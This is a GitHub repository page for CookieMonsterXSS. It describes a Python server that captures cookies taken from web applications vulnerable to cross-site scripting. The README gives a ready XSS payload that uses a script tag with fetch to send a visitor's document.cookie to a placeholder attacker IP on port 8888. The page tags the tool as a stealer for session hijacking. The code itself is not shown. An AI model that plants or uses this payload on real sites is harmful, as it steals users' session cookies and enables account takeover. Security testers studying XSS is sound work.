Skip to content
/ CookieMonsterXSS Public

Python server captures inbound HTTP connections along with its respective cookies

License

MIT license
1 star 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

shamo0/CookieMonsterXSS

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
cookieMonster.py
cookieMonster.py
 
 

Repository files navigation

CookieMonsterXSS

Cookie Monster Image Src:Null Byte

cookieMonster.py is a python http server listening to inbound connections. The server can be used to capture cookies from the web application that is vulnerable to Cross Site Scripting (XSS).

Example XSS payload:
<script>fetch(`http://<ATTACKER_MACHINE_IP>:8888?data=${document.cookie}`)</script>

Keep in mind, there are many ways to perform code injection; using the <script> element tag is just one of them. You can also perform XSS injections using HTML tags and CSS.

About

Python server captures inbound HTTP connections along with its respective cookies

Topics

python server exploit cookie xss payload cross-site-scripting stealer session-hijacking

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages